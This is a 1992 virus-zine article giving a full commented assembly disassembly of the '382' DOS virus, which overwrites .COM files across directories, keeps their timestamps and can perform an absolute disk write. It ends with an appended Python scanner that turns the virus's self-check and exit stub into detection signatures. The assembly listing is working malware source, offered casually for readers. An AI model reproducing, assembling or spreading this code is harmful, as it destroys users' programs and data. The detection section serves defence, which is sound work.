─────────═════════>>> Article From Evolution #2 - YAM '92
Article Title: 382 Virus
Author: Admiral Bailey

;=---
;
; 382 Virus (Family-Q as McAfee 91 calls it)
;
; Disassembled By Admiral Bailey [YAM '92]
; June 25, 1992
;
; The writer of this is unknown to me... maybe you should put some of
; your info in it.
;
; Notes: This virus I found on a board and got right to it. It wasn't
; too hard to disassemble since there was no encryption. It's a
; .com overwriting virus. Yes there is ????????exe inside the
; file but I don't know what the hell that is. If you run it, it
; only overwrites the com files. It probably gets exe files if no
; com files are found. But anyways there seems to be a bug in
; the original virus. Put it in a directory and run it; it will
; display crap and crash the computer. Without doing any
; damage. If you want any more info check it out for yourself.
; All I did this time was comment it.. cuz I found this to be a
; boring run of the mill virus. Anyways here it is.
;
;=---------

PAGE 59,132                     ; I gotta check out
                                ; what this means...

data_1e     equ 9Eh
data_15e    equ 0E000h
data_17e    equ 0E17Eh

seg_a       segment byte public
            assume cs:seg_a, ds:seg_a
            org 100h

382         proc far
start:
            jmp short $+2               ; just there to confuse
            mov cs:data_4,0             ; actually jumps to here
            mov ah,19h                  ; get default drive
            int 21h
            mov cs:data_11,al           ; save default drive
            mov ah,47h                  ; get present dir of
            mov dl,0                    ; current drive
            lea si,data_13              ; holds directory name
            int 21h
            clc
loc_1:
            jnc loc_2                   ; if no error then jump
            mov ah,17h                  ; rename file
            lea dx,data_7               ; Load effective addr
            int 21h
            cmp al,0FFh                 ; is there an error?
            jne loc_2                   ; no then jump
            mov ah,2Ch                  ; get current time
            int 21h
            mov al,cs:data_11           ; drive
            mov bx,dx                   ; buffer
            mov cx,2                    ; # of sectors
            mov dh,0                    ; parm block
            int 26h                     ; Absolute disk write
            jmp loc_9
loc_2:
            mov ah,3Bh                  ; set the current
            lea dx,data_10              ; directory
            int 21h
            jmp short loc_6
loc_3:
            mov ah,17h                  ; rename file
            lea dx,data_7
            int 21h
            mov ah,3Bh                  ; set current directory
            lea dx,data_10
            int 21h
            mov ah,4Eh                  ; find first file
            mov cx,11h
            lea dx,data_6               ; file type
            int 21h
            jc loc_1                    ; Jump if carry Set
            mov bx,cs:data_4            ; put value in bx
            inc bx                      ; check to see if it is
            dec bx                      ; zero
            jz loc_5
loc_4:
            mov ah,4Fh                  ; find next file
            int 21h
            jc loc_1                    ; none found then jump
            dec bx
            jnz loc_4                   ; Jump if not zero
loc_5:
            mov ah,2Fh                  ; get dta
            int 21h
            add bx,1Ch
            mov word ptr es:[bx],5C20h
            inc bx
            push ds                     ; save ds
            mov ax,es                   ; putting es into ds
            mov ds,ax
            mov dx,bx
            mov ah,3Bh                  ; get current dir
            int 21h
            pop ds                      ; get old ds
            mov bx,cs:data_4
            inc bx
            mov cs:data_4,bx
loc_6:
            mov ah,4Eh                  ; find first file
            mov cx,1
            lea dx,data_5               ; type to find
            int 21h
            jc loc_3                    ; none found then jump
            jmp short loc_8
loc_7:
            mov ah,4Fh                  ; find next file
            int 21h
            jc loc_3                    ; none found then jump
loc_8:
            mov ah,3Dh                  ; open file
            mov al,0
            mov dx,data_1e
            int 21h
            mov bx,ax                   ; file name in bx
            mov ah,3Fh                  ; read file
            mov cx,17Eh                 ; number of bytes
            nop
            mov dx,data_15e             ; buffer to hold the
            nop                         ; bytes
            int 21h
            mov ah,3Eh                  ; close the file
            int 21h
            mov bx,cs:data_15e
            cmp bx,0EBh
            je loc_7
            mov ah,43h                  ; get attrib
            mov al,0
            mov dx,data_1e              ; filename
            int 21h
            mov ah,43h                  ; set attrib
            mov al,1
            and cx,0FEh
            int 21h
            mov ah,3Dh                  ; open up the file
            mov al,2
            mov dx,data_1e              ; filename
            int 21h
            mov bx,ax                   ; filename
            mov ah,57h                  ; get files date and
            mov al,0                    ; time
            int 21h
            push cx                     ; save time
            push dx
            mov dx,word ptr cs:[23Ch]
            mov cs:data_17e,dx
            mov dx,word ptr cs:data_15e+1
            lea cx,cs:[13Bh]
            sub dx,cx
            mov word ptr cs:[23Ch],dx
            mov ah,40h                  ; write to file
            mov cx,17Eh                 ; size of virus [382]
            nop
            lea dx,ds:[100h]            ; Load effective addr
            int 21h
            mov ah,57h                  ; set files time+date
            mov al,1
            pop dx                      ; get old date+time
            pop cx
            int 21h
            mov ah,3Eh                  ; close up the file
            int 21h
            mov dx,cs:data_17e
            mov word ptr cs:[23Ch],dx
loc_9:
            call sub_1
            jmp $-3618h
            db 0B4h, 4Ch,0CDh, 21h      ; bytes to quit
                                        ; mov ax,4c00h
                                        ; int 21
382         endp

sub_1       proc near
            mov ah,3Bh                  ; set current dir
            lea dx,data_12              ; holds current
            int 21h                     ; directory
            retn
sub_1       endp

data_4      dw 0
data_5      db 2Ah
            db 2Eh, 63h, 6Fh, 6Dh, 00h
data_6      db 2Ah
            db 0
data_7      db 0FFh
            db 00h, 00h, 00h, 00h, 00h, 3Fh
            db 00h
            db 3Fh
            db 7 dup (3Fh)
            db 65h, 78h, 65h, 00h, 00h, 00h
            db 00h, 00h
            db 3Fh
            db 7 dup (3Fh)
            db 63h, 6Fh, 6Dh, 00h
data_10     db 5Ch
            db 0
data_11     db 4
data_12     db 5Ch
data_13     db 0

seg_a       ends
            end start
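The listing gives a defender two usable signatures: at loc_8 the virus reads the first 17Eh bytes of each candidate .COM file and skips it when the first word is 0EBh (bytes EB 00, the encoding of its own `jmp short $+2`), and the 382-byte body it writes over the host ends with the exit stub `db 0B4h,4Ch,0CDh,21h`. The scanner below is an added example, not code from the article or from Admiral Bailey; it turns that self-recognition check into a detection heuristic for files of this family. The sample files it scans are constructed inline (a NOP sled between the marker and the exit stub) and are not a virus body; the function and file names are my own.

```python
"""Heuristic scanner for .COM files overwritten by the 382 virus.

Added example, not from the article. Signatures taken from the listing:
  - bytes EB 00 at offset 0 (the `cmp bx,0EBh` already-infected check)
  - the exit stub B4 4C CD 21 (mov ah,4Ch / int 21h) inside the first
    0x17E (382) bytes, which is how much the virus writes (mov cx,17Eh).
"""
import os
import tempfile

VIRUS_LEN = 0x17E                 # 382 bytes written over the host
MARKER = b"\xEB\x00"              # jmp short $+2, the virus's first instruction
EXIT_STUB = b"\xB4\x4C\xCD\x21"   # mov ah,4Ch / int 21h from the listing


def looks_infected(data: bytes) -> bool:
    """Return True if a .COM image matches both 382 heuristics."""
    if len(data) < VIRUS_LEN:
        return False              # a full 382-byte body is always written
    body = data[:VIRUS_LEN]
    return body.startswith(MARKER) and EXIT_STUB in body


def scan_directory(path: str) -> list[str]:
    """Return the names of .COM files under `path` that trip the heuristic."""
    hits = []
    for name in sorted(os.listdir(path)):
        if not name.lower().endswith(".com"):
            continue              # the virus only targets *.com (data_5)
        with open(os.path.join(path, name), "rb") as fh:
            head = fh.read(VIRUS_LEN)
        if looks_infected(head):
            hits.append(name)
    return hits


# Constructed samples (hypothetical, not real virus bodies): one image shaped
# like an overwritten host, one ordinary .COM that just exits to DOS.
SAMPLE_INFECTED = (MARKER
                   + b"\x90" * (VIRUS_LEN - len(MARKER) - len(EXIT_STUB))
                   + EXIT_STUB)
SAMPLE_CLEAN = b"\xB8\x00\x4C\xCD\x21" + b"\x90" * 400   # mov ax,4C00h / int 21h


def demo() -> list[str]:
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "INFECTED.COM"), "wb") as fh:
            fh.write(SAMPLE_INFECTED)
        with open(os.path.join(tmp, "CLEAN.COM"), "wb") as fh:
            fh.write(SAMPLE_CLEAN)
        with open(os.path.join(tmp, "NOTES.TXT"), "wb") as fh:
            fh.write(SAMPLE_INFECTED)   # wrong extension, must be ignored
        return scan_directory(tmp)


if __name__ == "__main__":
    print(demo())   # ['INFECTED.COM']
```

Two points follow from the listing and shape the heuristic. The virus opens the host with AL=2 and writes 382 bytes from offset 100h without truncating, so an infected host keeps its original length; file size is therefore not a signature and the scanner does not use it. Conversely a legitimate program could begin with EB 00, so the EB 00 marker alone would false-positive; requiring the exit stub inside the same 382-byte window is what keeps the check specific to this body.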